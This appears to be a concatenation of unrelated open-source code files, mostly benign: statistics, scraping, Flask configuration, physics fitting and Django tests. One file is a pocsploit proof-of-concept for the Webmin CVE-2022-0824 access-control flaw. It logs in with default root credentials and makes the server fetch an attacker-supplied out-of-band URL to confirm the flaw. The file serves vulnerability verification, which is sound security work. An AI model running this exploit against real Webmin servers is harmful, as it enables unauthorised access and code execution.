.. [1] <NAME>., <NAME>., <NAME>., & <NAME>. (2009).
Dealing with Limited Overlap in Estimation of
Average Treatment Effects. Biometrika, 96, 187-199.
"""
pscore = self.raw_data['pscore']
g = 1.0/(pscore*(1-pscore)) # 1 over Bernoulli variance
self.cutoff = select_cutoff(g)
self.trim()
def stratify(self):
"""
Stratifies the sample based on propensity score.
By default the sample is divided into five equal-sized bins.
The number of bins can be set by modifying the object
attribute named blocks. Alternatively, custom-sized bins can
be created by setting blocks equal to a sorted list of numbers
between 0 and 1 indicating the bin boundaries.
This method should only be executed after the propensity score
has been estimated.
"""
Y, D, X = self.raw_data['Y'], self.raw_data['D'], self.raw_data['X']
pscore = self.raw_data['pscore']
if isinstance(self.blocks, int):
blocks = split_equal_bins(pscore, self.blocks)
else:
blocks = self.blocks[:] # make a copy; should be sorted
blocks[0] = 0 # avoids always dropping 1st unit
def subset(p_low, p_high):
return (p_low < pscore) & (pscore <= p_high)
subsets = [subset(*ps) for ps in zip(blocks, blocks[1:])]
strata = [CausalModel(Y[s], D[s], X[s]) for s in subsets]
self.strata = Strata(strata, subsets, pscore)
def stratify_s(self):
"""
Stratifies the sample based on propensity score using the
bin selection procedure suggested by [1]_.
The bin selection algorithm is based on a sequence of
two-sample t tests performed on the log-odds ratio.
This method should only be executed after the propensity score
has been estimated.
References
----------
.. [1] <NAME>. & <NAME>. (2015). Causal Inference in
Statistics, Social, and Biomedical Sciences: An
Introduction.
"""
pscore_order = self.raw_data['pscore'].argsort()
pscore = self.raw_data['pscore'][pscore_order]
D = self.raw_data['D'][pscore_order]
logodds = np.log(pscore / (1-pscore))
K = self.raw_data['K']
blocks_uniq = set(select_blocks(pscore, logodds, D, K, 0, 1))
self.blocks = sorted(blocks_uniq)
self.stratify()
def est_via_ols(self, adj=2):
"""
Estimates average treatment effects using least squares.
Parameters
----------
adj: int (0, 1, or 2)
Indicates how covariate adjustments are to be
performed. Set adj = 0 to not include any
covariates. Set adj = 1 to include treatment
indicator D and covariates X separately. Set
adj = 2 to additionally include interaction
terms between D and X. Defaults to 2.
"""
self.estimates['ols'] = OLS(self.raw_data, adj)
def est_via_blocking(self, adj=1):
"""
Estimates average treatment effects using regression within
blocks.
This method should only be executed after the sample has been
stratified.
Parameters
----------
adj: int (0, 1, or 2)
Indicates how covariate adjustments are to be
performed for each within-bin regression.
Set adj = 0 to not include any covariates.
Set adj = 1 to include treatment indicator D
and covariates X separately. Set adj = 2 to
additionally include interaction terms between
D and X. Defaults to 1.
"""
self.estimates['blocking'] = Blocking(self.strata, adj)
def est_via_weighting(self):
"""
Estimates average treatment effects using doubly-robust
version of the Horvitz-Thompson weighting estimator.
"""
self.estimates['weighting'] = Weighting(self.raw_data)
def est_via_matching(self, weights='inv', matches=1, bias_adj=False):
"""
Estimates average treatment effects using nearest-
neighborhood matching.
Matching is done with replacement. Method supports multiple
matching. Correcting bias that arise due to imperfect matches
is also supported. For details on methodology, see [1]_.
Parameters
----------
weights: str or positive definite square matrix
Specifies weighting matrix used in computing
distance measures. Defaults to string 'inv',
which does inverse variance weighting. String
'maha' gives the weighting matrix used in the
Mahalanobis metric.
matches: int
Number of matches to use for each subject.
bias_adj: bool
Specifies whether bias adjustments should be
attempted.
References
----------
.. [1] <NAME>. & <NAME>. (2015). Causal Inference in
Statistics, Social, and Biomedical Sciences: An
Introduction.
"""
X, K = self.raw_data['X'], self.raw_data['K']
X_c, X_t = self.raw_data['X_c'], self.raw_data['X_t']
if weights == 'inv':
W = 1/X.var(0)
elif weights == 'maha':
V_c = np.cov(X_c, rowvar=False, ddof=0)
V_t = np.cov(X_t, rowvar=False, ddof=0)
if K == 1:
W = 1/np.array([[(V_c+V_t)/2]]) # matrix form
else:
W = np.linalg.inv((V_c+V_t)/2)
else:
W = weights
self.estimates['matching'] = Matching(self.raw_data, W,
matches, bias_adj)
def _post_pscore_init(self):
self.cutoff = 0.1
self.blocks = 5
def parse_lin_terms(K, lin):
if lin is None:
return []
elif lin == 'all':
return range(K)
else:
return lin
def parse_qua_terms(K, qua):
if qua is None:
return []
elif qua == 'all':
return list(combinations_with_replacement(range(K), 2))
else:
return qua
def sumlessthan(g, sorted_g, cumsum):
deduped_values = dict(zip(sorted_g, cumsum))
return np.array([deduped_values[x] for x in g])
def select_cutoff(g):
if g.max() <= 2*g.mean():
cutoff = 0
else:
sorted_g = np.sort(g)
cumsum_1 = range(1, len(g)+1)
LHS = g * sumlessthan(g, sorted_g, cumsum_1)
cumsum_g = np.cumsum(sorted_g)
RHS = 2 * sumlessthan(g, sorted_g, cumsum_g)
gamma = np.max(g[LHS <= RHS])
cutoff = 0.5 - np.sqrt(0.25 - 1./gamma)
return cutoff
def split_equal_bins(pscore, blocks):
q = np.linspace(0, 100, blocks+1)[1:-1] # q as in qth centiles
centiles = [np.percentile(pscore, x) for x in q]
return [0] + centiles + [1]
def calc_tstat(sample_c, sample_t):
N_c = sample_c.shape[0]
N_t = sample_t.shape[0]
var_c = sample_c.var(ddof=1)
var_t = sample_t.var(ddof=1)
return (sample_t.mean()-sample_c.mean()) / np.sqrt(var_c/N_c+var_t/N_t)
def calc_sample_sizes(D):
N = D.shape[0]
mid_index = N // 2
Nleft = mid_index
Nleft_t = D[:mid_index].sum()
Nleft_c = Nleft - Nleft_t
Nright = N - Nleft
Nright_t = D[mid_index:].sum()
Nright_c = Nright - Nright_t
return (Nleft_c, Nleft_t, Nright_c, Nright_t)
def select_blocks(pscore, logodds, D, K, p_low, p_high):
scope = (pscore >= p_low) & (pscore <= p_high)
c, t = (scope & (D==0)), (scope & (D==1))
Nleft_c, Nleft_t, Nright_c, Nright_t = calc_sample_sizes(D[scope])
if min(Nleft_c, Nleft_t, Nright_c, Nright_t) < K+1:
return [p_low, p_high]
tstat = calc_tstat(logodds[c], logodds[t])
if tstat <= 1.96:
return [p_low, p_high]
low = pscore[scope][0]
mid = pscore[scope][scope.sum() // 2]
high = pscore[scope][-1]
return select_blocks(pscore, logodds, D, K, low, mid) + \
select_blocks(pscore, logodds, D, K, mid, high)
|
lib/disco/sysutil.py | pooya/disco | 786 | 11187987 | <reponame>pooya/disco<filename>lib/disco/sysutil.py
import sys, resource
from ctypes import *
import ctypes.util
if sys.platform == "darwin":
def available_memory():
libc = cdll.LoadLibrary(ctypes.util.find_library("libc"))
mem = c_uint64(0)
size = c_size_t(sizeof(mem))
libc.sysctlbyname.argtypes = [
c_char_p, c_void_p, c_void_p, c_void_p, c_ulong
]
libc.sysctlbyname(
b"hw.memsize",
c_voidp(addressof(mem)),
c_voidp(addressof(size)),
None,
0
)
return int(mem.value)
elif "linux" in sys.platform:
def available_memory():
libc = cdll.LoadLibrary(ctypes.util.find_library("libc"))
return libc.getpagesize() * libc.get_phys_pages()
else:
def available_memory():
return int(1024**4)
def set_mem_limit(limit):
bytes = 0
if limit.endswith('%'):
p = float(limit[:-1]) / 100.0
bytes = int(p * available_memory())
elif limit:
bytes = int(limit)
if bytes > 0:
soft, hard = resource.getrlimit(resource.RLIMIT_AS)
bmin = lambda x: min(bytes if x < 0 else x, bytes)
resource.setrlimit(resource.RLIMIT_AS, (bmin(soft), bmin(hard)))
|
us-weather-history/wunderground_scraper.py | h4ckfu/data | 16,124 | 11187988 | # coding: utf-8
from datetime import datetime, timedelta
from urllib.request import urlopen
import os
def scrape_station(station):
'''
This function scrapes the weather data web pages from wunderground.com
for the station you provide it.
You can look up your city's weather station by performing a search for
it on wunderground.com then clicking on the "History" section.
The 4-letter name of the station will appear on that page.
'''
# Scrape between July 1, 2014 and July 1, 2015
# You can change the dates here if you prefer to scrape a different range
current_date = datetime(year=2014, month=7, day=1)
end_date = datetime(year=2015, month=7, day=1)
# Make sure a directory exists for the station web pages
os.mkdir(station)
# Use .format(station, YYYY, M, D)
lookup_URL = 'http://www.wunderground.com/history/airport/{}/{}/{}/{}/DailyHistory.html'
while current_date != end_date:
if current_date.day == 1:
print(current_date)
formatted_lookup_URL = lookup_URL.format(station,
current_date.year,
current_date.month,
current_date.day)
html = urlopen(formatted_lookup_URL).read().decode('utf-8')
out_file_name = '{}/{}-{}-{}.html'.format(station, current_date.year,
current_date.month,
current_date.day)
with open(out_file_name, 'w') as out_file:
out_file.write(html)
current_date += timedelta(days=1)
# Scrape the stations used in this article
for station in ['KCLT', 'KCQT', 'KHOU', 'KIND', 'KJAX',
'KMDW', 'KNYC', 'KPHL', 'KPHX', 'KSEA']:
scrape_station(station)
|
parser.py | fossasia/open-event-scraper | 2,140 | 11188026 | # result is a dictionary of the excel sheet
def get_linkedin_url(result):
if result.has_key("linkedin"):
return result["linkedin"]
elif result.has_key("Linkedin"):
return result["Linkedin"]
elif result.has_key("LinkedIn"):
return result["LinkedIn"]
elif result.has_key("linkedIn"):
return result["linkedIn"]
return ""
def get_pic_url(result):
if result.has_key("Photo for Website and Program"):
return result["Photo for Website and Program"]
elif result.has_key("image"):
return result["image"]
return ""
|
flask_editablesite/settings.py | Jaza/flask-editablesite | 115 | 11188029 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
import ast
import os
import pymemcache.client.base as memcached
os_env = os.environ
class Config(object):
SECRET_KEY = os_env.get(
'FLASK_EDITABLESITE_SECRET',
'secret-key') # TODO: Change me
APP_DIR = os.path.abspath(
os.path.dirname(__file__)) # This directory
PROJECT_ROOT = os.path.abspath(os.path.join(APP_DIR, os.pardir))
SQLALCHEMY_DATABASE_URI = os_env.get(
'FLASK_EDITABLESITE_DATABASE_URI',
'postgresql://localhost/example') # TODO: Change me
SESSION_TYPE = os_env.get('FLASK_EDITABLESITE_SESSION_TYPE', None)
SESSION_USE_SIGNER = True
SESSION_KEY_PREFIX = 'flask-editablesite-session:'
SESSION_MEMCACHED = (
os_env.get('FLASK_EDITABLESITE_SESSION_MEMCACHED', None)
and memcached.Client(
[os_env.get('FLASK_EDITABLESITE_SESSION_MEMCACHED', None)],
binary=True)
or None)
SESSION_FILE_DIR = (
os_env.get('FLASK_EDITABLESITE_SESSION_FILE_DIR', None)
and os.path.abspath(os.path.join(
APP_DIR,
os_env.get('FLASK_EDITABLESITE_SESSION_FILE_DIR', None)))
or None)
USE_SESSIONSTORE_NOT_DB = (
os_env.get('FLASK_EDITABLESITE_USE_SESSIONSTORE_NOT_DB')
and ast.literal_eval(
os_env.get('FLASK_EDITABLESITE_USE_SESSIONSTORE_NOT_DB'))
or False)
SESSIONSTORE_USER_EMAIL = os_env.get(
'FLASK_EDITABLESITE_SESSIONSTORE_USER_EMAIL',
'<EMAIL>')
SESSIONSTORE_USER_FIRST_NAME = os_env.get(
'FLASK_EDITABLESITE_SESSIONSTORE_USER_FIRST_NAME',
'Test')
SESSIONSTORE_USER_LAST_NAME = os_env.get(
'FLASK_EDITABLESITE_SESSIONSTORE_USER_LAST_NAME',
'Dude')
SESSIONSTORE_USER_PASSWORD = os_env.get(
'FLASK_EDITABLESITE_SESSIONSTORE_USER_PASSWORD',
'<PASSWORD>')
BCRYPT_LOG_ROUNDS = 13
ASSETS_DEBUG = False
DEBUG_TB_ENABLED = False # Disable Debug toolbar
DEBUG_TB_INTERCEPT_REDIRECTS = False
CACHE_TYPE = 'simple' # Can be "memcached", "redis", etc.
SITE_NAME = 'Flask Editable Site'
ADMINS = (os_env.get('FLASK_EDITABLESITE_ADMINS')
and os_env.get('FLASK_EDITABLESITE_ADMINS').split(',')
or [])
MAIL_DEFAULT_SENDER = os_env.get(
'FLASK_EDITABLESITE_MAIL_DEFAULT_SENDER',
'<EMAIL>')
CONTACT_EMAIL_RECIPIENTS = (
os_env.get('FLASK_EDITABLESITE_CONTACT_EMAIL_RECIPIENTS')
and (
os_env.get('FLASK_EDITABLESITE_CONTACT_EMAIL_RECIPIENTS')
.split(','))
or [])
MAIL_SERVER = os_env.get(
'FLASK_EDITABLESITE_MAIL_SERVER', 'localhost')
MAIL_PORT = (
os_env.get('FLASK_EDITABLESITE_MAIL_PORT')
and ast.literal_eval(os_env.get('FLASK_EDITABLESITE_MAIL_PORT'))
or 25)
MAIL_USE_TLS = (
os_env.get('FLASK_EDITABLESITE_MAIL_USE_TLS')
and ast.literal_eval(
os_env.get('FLASK_EDITABLESITE_MAIL_USE_TLS'))
or False)
MAIL_USE_SSL = (
os_env.get('FLASK_EDITABLESITE_MAIL_USE_SSL')
and ast.literal_eval(
os_env.get('FLASK_EDITABLESITE_MAIL_USE_SSL'))
or False)
MAIL_USERNAME = os_env.get('FLASK_EDITABLESITE_MAIL_USERNAME', None)
MAIL_PASSWORD = os_env.get('FLASK_EDITABLESITE_MAIL_PASSWORD', None)
GOOGLE_ANALYTICS_ACCOUNT_ID = os_env.get(
'FLASK_EDITABLESITE_GOOGLE_ANALYTICS_ACCOUNT_ID', None)
SESSION_COOKIE_NAME = 'flask_editablesite_session'
REMEMBER_COOKIE_NAME = 'flask_editablesite_remember_token'
UPLOADS_RELATIVE_PATH = 'uploads/'
MEDIA_FOLDER = os.path.abspath(
os.path.join(APP_DIR, 'static/uploads'))
MEDIA_URL = '/static/uploads/'
MEDIA_THUMBNAIL_FOLDER = os.path.abspath(
os.path.join(APP_DIR, 'static/cache/thumbnails'))
MEDIA_THUMBNAIL_URL = 'cache/thumbnails/'
ERROR_MAIL_FORMAT = (
'\n'
'Message type: %(levelname)s\n'
'Location: %(pathname)s:%(lineno)d\n'
'Module: %(module)s\n'
'Function: %(funcName)s\n'
'Time: %(asctime)s\n'
'\n'
'Message:\n'
'\n'
'%(message)s\n')
EDITABLE_MODELS = {
'short_text_content_block': {
'classpath': (
'flask_editablesite.contentblock.models'
'.ShortTextContentBlock'),
'identifier_field': 'slug',
'title_field': 'title',
'text_fields': ['content'],
},
'rich_text_content_block': {
'classpath': (
'flask_editablesite.contentblock.models'
'.RichTextContentBlock'),
'identifier_field': 'slug',
'title_field': 'title',
'long_text_fields': ['content'],
},
'image_content_block': {
'classpath': (
'flask_editablesite.contentblock.models'
'.ImageContentBlock'),
'identifier_field': 'slug',
'title_field': 'title',
'image_fields': ['image'],
'image_relative_path': 'image-content-block/',
},
'gallery_item': {
'classpath': (
'flask_editablesite.gallery.models'
'.GalleryItem'),
'identifier_field': 'id',
'title_field': 'title',
'text_fields': ['title', 'date_taken'],
'long_text_fields': ['content'],
'image_fields': ['image'],
'image_relative_path': 'gallery-item/',
'is_createable': True,
'is_deleteable': True,
'is_reorderable': True,
'weight_field': 'weight',
'reorder_form_prefix': 'gallery_',
},
'event': {
'classpath': 'flask_editablesite.event.models.Event',
'identifier_field': 'id',
'title_field': 'title',
'text_fields': ['title', 'event_url',
'location_name', 'location_url'],
'date_fields': ['start_date', 'end_date'],
'time_fields': ['start_time', 'end_time'],
'is_createable': True,
'is_deleteable': True,
},
}
EDITABLE_SAMPLE_IMAGES_SCRAPE_URL = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_SCRAPE_URL', None)
EDITABLE_SAMPLE_IMAGES_SCRAPE_PARENTELNAME = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_SCRAPE_PARENTELNAME',
None)
EDITABLE_SAMPLE_IMAGES_SCRAPE_PARENTELCLASS = os_env.get(
(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_SCRAPE'
'_PARENTELCLASS'),
None)
EDITABLE_SAMPLE_IMAGES_SCRAPE_ONLYFIRSTEL = (
os_env.get(
('FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_SCRAPE'
'_ONLYFIRSTEL'))
and ast.literal_eval(os_env.get(
('FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_SCRAPE'
'_ONLYFIRSTEL')))
or False)
EDITABLE_SAMPLE_IMAGES_RELATIVE_PATH = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_RELATIVE_PATH',
None)
EDITABLE_PLACEHOLDER_IMAGE_RELATIVE_PATH = 'placeholder.png'
EDITABLE_SAMPLE_TEXT_SCRAPE_URLS = (
os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_TEXT_SCRAPE_URLS')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_TEXT_SCRAPE_URLS'))
or [])
EDITABLE_PLACEHOLDER_TEXT = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_PLACEHOLDER_TEXT', (
'<p>Lorem ipsum dolor sit amet, consectetur adipiscing '
'elit. Curabitur enim magna, dignissim sit amet aliquet '
'sed, varius sit amet tellus. Nam elementum, est non '
'dignissim egestas, est turpis ornare nunc, ac ornare '
'nisi purus id orci. Integer blandit sed leo eu tempus. '
'Donec egestas nisl lectus, congue efficitur velit '
'mollis mattis.</p>'))
EDITABLE_SAMPLE_URLS = (
os_env.get('FLASK_EDITABLESITE_EDITABLE_SAMPLE_URLS')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_URLS'))
or ['http://google.com/', 'http://facebook.com/',
'http://youtube.com/', 'http://yahoo.com/',
'http://amazon.com/', 'http://wikipedia.org/',
'http://twitter.com/', 'http://live.com/',
'http://linkedin.com/', 'http://ebay.com/',
'http://bing.com/', 'http://instagram.com/'])
EDITABLE_SAMPLE_IMAGES_CREDITS = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_CREDITS', None)
EDITABLE_SAMPLE_TEXT_CREDITS = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_TEXT_CREDITS', None)
GALLERY_NUM_DEFAULT_ITEMS = (
os_env.get('FLASK_EDITABLESITE_GALLERY_NUM_DEFAULT_ITEMS')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_GALLERY_NUM_DEFAULT_ITEMS'))
or 6)
GALLERY_LIMIT = (
os_env.get('FLASK_EDITABLESITE_GALLERY_LIMIT')
and ast.literal_eval(
os_env.get('FLASK_EDITABLESITE_GALLERY_LIMIT'))
or 3)
EVENT_NUM_DEFAULT_ITEMS = (
os_env.get('FLASK_EDITABLESITE_EVENT_NUM_DEFAULT_ITEMS')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_EVENT_NUM_DEFAULT_ITEMS'))
or 12)
EVENT_UPCOMING_LIMIT = (
os_env.get('FLASK_EDITABLESITE_EVENT_UPCOMING_LIMIT')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_EVENT_UPCOMING_LIMIT'))
or 3)
EVENT_PAST_LIMIT = (
os_env.get('FLASK_EDITABLESITE_EVENT_PAST_LIMIT')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_EVENT_PAST_LIMIT'))
or 3)
class ProdConfig(Config):
"""Production configuration."""
ENV = 'prod'
DEBUG = False
DEBUG_TB_ENABLED = False # Disable Debug toolbar
class DevConfig(Config):
"""Development configuration."""
ENV = 'dev'
DEBUG = True
DEBUG_TB_ENABLED = True
ASSETS_DEBUG = True # Don't bundle/minify static assets
class TestConfig(Config):
TESTING = True
DEBUG = True
BCRYPT_LOG_ROUNDS = 1 # For faster tests
WTF_CSRF_ENABLED = False # Allows form testing
|
submitit/local/_local.py | sidsamsi/submitit | 602 | 11188056 | <reponame>sidsamsi/submitit
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import sys
from pathlib import Path
from .local import Controller
if __name__ == "__main__":
assert len(sys.argv) == 2, "Usage: _local.py <submitit_folder>"
# most arguments are read from environment variables.
controller = Controller(Path(sys.argv[1]))
controller.run()
|
examples/signal_bkg_mass_fit.py | simonthor/zfit | 129 | 11188107 | <filename>examples/signal_bkg_mass_fit.py
# Copyright (c) 2020 zfit
import zfit
# create space
obs = zfit.Space("x", limits=(-10, 10))
# parameters
mu = zfit.Parameter("mu", 1., -4, 6)
sigma = zfit.Parameter("sigma", 1., 0.1, 10)
lambd = zfit.Parameter("lambda", -0.06, -1, -0.01)
frac = zfit.Parameter("fraction", 0.3, 0, 1)
# model building, pdf creation
gauss = zfit.pdf.Gauss(mu=mu, sigma=sigma, obs=obs)
exponential = zfit.pdf.Exponential(lambd, obs=obs)
model = zfit.pdf.SumPDF([gauss, exponential], fracs=frac)
# data
n_sample = 10000
data = model.create_sampler(n_sample, limits=obs)
data.resample()
# set the values to a start value for the fit
mu.set_value(0.5)
sigma.set_value(1.2)
lambd.set_value(-0.05)
frac.set_value(0.07)
# create NLL
nll = zfit.loss.UnbinnedNLL(model=model, data=data)
# create a minimizer
minimizer = zfit.minimize.Minuit()
result = minimizer.minimize(nll)
print(result)
# do the error calculations, here with minos
param_hesse = result.hesse()
param_errors, new_result = result.errors()
print(result.params)
|
2022/CVE-2022-0824/poc/pocsploit/CVE-2022-0824.py | hjyuan/reapoc | 421 | 11188111 | <gh_stars>100-1000
import requests
from plugins.oob import verify_request, gen_oob_domain
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Webmin below 1.990 - File Manager privilege exploit''',
"description": '''Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.''',
"severity": "high",
"references": [
"https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py",
"https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-0824/vultarget",
"https://nvd.nist.gov/vuln/detail/CVE-2022-0824"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "8.8",
"cve-id": "CVE-2022-0824",
"cwe-id": "CWE-863. CWE-284"
},
"metadata":{
"vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-0824/vultarget"
},
"tags": ["webmin", "privilege", "auth"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
username = "root"
password = "password"
try:
url = format_url(url)
oob_domain,flag = gen_oob_domain()
path = """/session_login.cgi"""
method = "POST"
data = '''user={username}&pass={password}'''.format(username=username, password=password)
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'redirect=1;testing=1;PHPSESSID=;'
}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/extensions/file-manager/http_download.cgi?module=filemin"""
method = "POST"
data = """link=http://{oob_domain}&username=&password=&path=/xxx""".format(oob_domain=oob_domain)
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Referer': '{}/filemin/?xnavigation=1'.format(url)
}
resp1 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url |
docs/manual/inputs/python_control_port.py | cpick/mongrel2 | 299 | 11188121 | import zmq
from mongrel2 import tnetstrings
from pprint import pprint
CTX = zmq.Context()
addr = "ipc://run/control"
ctl = CTX.socket(zmq.REQ)
print "CONNECTING"
ctl.connect(addr)
while True:
cmd = raw_input("> ")
# will only work with simple commands that have no arguments
ctl.send(tnetstrings.dump([cmd, {}]))
resp = ctl.recv()
pprint(tnetstrings.parse(resp))
ctl.close()
|
th_pocket/tests.py | Leopere/django-th | 1,069 | 11188130 | <reponame>Leopere/django-th
# coding: utf-8
import arrow
import datetime
from django.conf import settings
from django_th.tests.test_main import MainTest
from pocket import Pocket
from th_pocket.forms import PocketProviderForm, PocketConsumerForm
from th_pocket.models import Pocket as PocketModel
from th_pocket.my_pocket import ServicePocket
from unittest.mock import patch
class PocketTest(MainTest):
"""
PocketTest Model
"""
def create_pocket(self):
trigger = self.create_triggerservice(consumer_name='ServicePocket')
tag = 'test'
title = 'foobar'
url = 'http://foobar.com/somewhere/other/the/rainbow'
tweet_id = ''
status = True
return PocketModel.objects.create(tag=tag, url=url, title=title,
tweet_id=tweet_id, trigger=trigger,
status=status)
class PocketModelAndFormTest(PocketTest):
"""
PocketModelTest
"""
def test_pocket(self):
p = self.create_pocket()
self.assertTrue(isinstance(p, PocketModel))
self.assertEqual(p.show(), "My Pocket {}".format(p.url))
self.assertEqual(p.__str__(), "{}".format(p.url))
def test_get_config_th(self):
"""
does this settings exists ?
"""
self.assertTrue(settings.TH_POCKET_KEY)
def test_get_services_list(self):
th_service = ('th_pocket.my_pocket.ServicePocket',)
for service in th_service:
self.assertIn(service, settings.TH_SERVICES)
"""
Form
"""
# provider
def test_valid_provider_form(self):
"""
test if that form is a valid provider one
"""
p = self.create_pocket()
data = {'tag': p.tag}
form = PocketProviderForm(data=data)
self.assertTrue(form.is_valid())
form = PocketProviderForm(data={})
self.assertTrue(form.is_valid())
# consumer
def test_valid_consumer_form(self):
"""
test if that form is a valid consumer one
"""
p = self.create_pocket()
data = {'tag': p.tag}
form = PocketConsumerForm(data=data)
self.assertTrue(form.is_valid())
form = PocketConsumerForm(data={})
self.assertTrue(form.is_valid())
class ServicePocketTest(PocketTest):
"""
ServicePocketTest
"""
def setUp(self):
super(ServicePocketTest, self).setUp()
self.pocket = self.create_pocket()
self.date_triggered = datetime.datetime(2013, 6, 10, 00, 00)
self.data = {'link': 'http://foo.bar/some/thing/else/what/else',
'title': 'what else'}
self.token = '<PASSWORD>'
self.trigger_id = 1
self.service = ServicePocket(self.token)
@patch.object(Pocket, 'get')
def test_read_data(self, mock1):
kwargs = {'date_triggered': self.date_triggered,
'link': 'http://foo.bar/some/thing/else/what/else',
'title': 'what else'}
since = arrow.get(self.date_triggered).timestamp
sp = ServicePocket(self.token)
sp.read_data(**kwargs)
mock1.assert_called_once_with(since=since, state='unread')
@patch.object(Pocket, 'add')
def test_save_data(self, mock1):
self.assertTrue(self.token)
self.assertTrue(isinstance(self.trigger_id, int))
self.assertIn('link', self.data)
self.assertIn('title', self.data)
self.assertIsNotNone(self.data['link'])
self.assertNotEqual(self.data['title'], '')
se = ServicePocket(self.token)
se.save_data(self.trigger_id, **self.data)
mock1.assert_called_once_with(url=self.data.get('link'),
title=self.data.get('title'),
tags=self.pocket.tag)
def test_save_data_no_url(self):
self.assertTrue(self.token)
self.assertTrue(isinstance(self.trigger_id, int))
self.assertIn('link', self.data)
self.assertIn('title', self.data)
self.assertIsNotNone(self.data['link'])
self.assertNotEqual(self.data['title'], '')
self.data['link'] = ''
se = ServicePocket(self.token)
status = se.save_data(self.trigger_id, **{'title': 'what else'})
self.assertFalse(status)
def test_get_config_th(self):
"""
does this settings exists ?
"""
self.assertTrue(settings.TH_POCKET_KEY)
self.assertIn('consumer_key', settings.TH_POCKET_KEY)
def test_auth(self):
pass
def test_callback(self):
pass
|
configs/repvgg/deploy/repvgg-A2_deploy_4xb64-coslr-120e_in1k.py | YuxinZou/mmclassification | 1,190 | 11188161 | _base_ = '../repvgg-A2_4xb64-coslr-120e_in1k.py'
model = dict(backbone=dict(deploy=True))
|
tests/unit/analysis/test_grid.py | CartoDB/cartoframes | 236 | 11188172 | # """Unit tests for cartoframes.analysis.grid"""
import os
import pytest
import numpy as np
from pandas import read_csv
from geopandas import GeoDataFrame
from shapely.geometry import box, shape
from cartoframes.analysis.grid import QuadGrid
from cartoframes.utils.geom_utils import set_geometry
from geopandas.testing import assert_geodataframe_equal
# DATA FRAME SRC BBOX
pol_1 = box(1, 1, 2, 2)
pol_2 = box(3, 3, 4, 4)
GDF_BOX = GeoDataFrame({'id': [1, 2], 'geom': [pol_1, pol_2]}, columns=['id', 'geom'], geometry='geom')
pol_geojson = {
'type': 'Polygon',
'coordinates': [
[
[
-5.899658203125,
38.436379603
],
[
-6.690673828125,
37.67512527892127
],
[
-6.15234375,
37.43997405227057
],
[
-5.8447265625,
37.70120736474139
],
[
-6.13037109375,
37.82280243352756
],
[
-5.877685546874999,
38.02213147353745
],
[
-6.009521484375,
38.12591462924157
],
[
-5.5810546875,
38.1777509666256
],
[
-5.899658203125,
38.436379603
]
]
]
}
GDF_IRREGULAR = GeoDataFrame({'id': [1], 'geom': [shape(pol_geojson)]}, columns=['id', 'geom'], geometry='geom')
BASE_FOLDER = os.path.dirname(os.path.abspath(__file__))
class TestGrid(object):
def _load_test_gdf(self, fname):
fname = os.path.join(BASE_FOLDER, fname)
df = read_csv(fname, dtype={'id': np.int64, 'geom': object, 'quadkey': object})
gdf = GeoDataFrame(df, crs='epsg:4326')
set_geometry(gdf, 'geom', inplace=True)
return gdf
@pytest.mark.skip()
def test_quadgrid_polyfill_box(self, mocker):
"""cartoframes.analysis.grid.QuadGrid.polyfill"""
gdf = QuadGrid().polyfill(GDF_BOX, 12)
assert isinstance(gdf, GeoDataFrame)
# Check both dataframes are equals
gdf_test = self._load_test_gdf('grid_quadkey_bbox.csv')
assert_geodataframe_equal(gdf, gdf_test, check_less_precise=True)
@pytest.mark.skip()
def test_quadgrid_polyfill_pol(self, mocker):
"""cartoframes.analysis.grid.QuadGrid.polyfill"""
gdf = QuadGrid().polyfill(GDF_IRREGULAR, 12)
assert isinstance(gdf, GeoDataFrame)
# Check both dataframes are equals
gdf_test = self._load_test_gdf('grid_quadkey_pol.csv')
assert_geodataframe_equal(gdf, gdf_test, check_less_precise=True)
|
test.py | fxia22/kdnet.pytorch | 116 | 11188198 | from datasets import PartDataset
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import torch.optim as optim
from kdtree import make_cKDTree
import sys
num_points = 2048
class KDNet(nn.Module):
def __init__(self, k = 16):
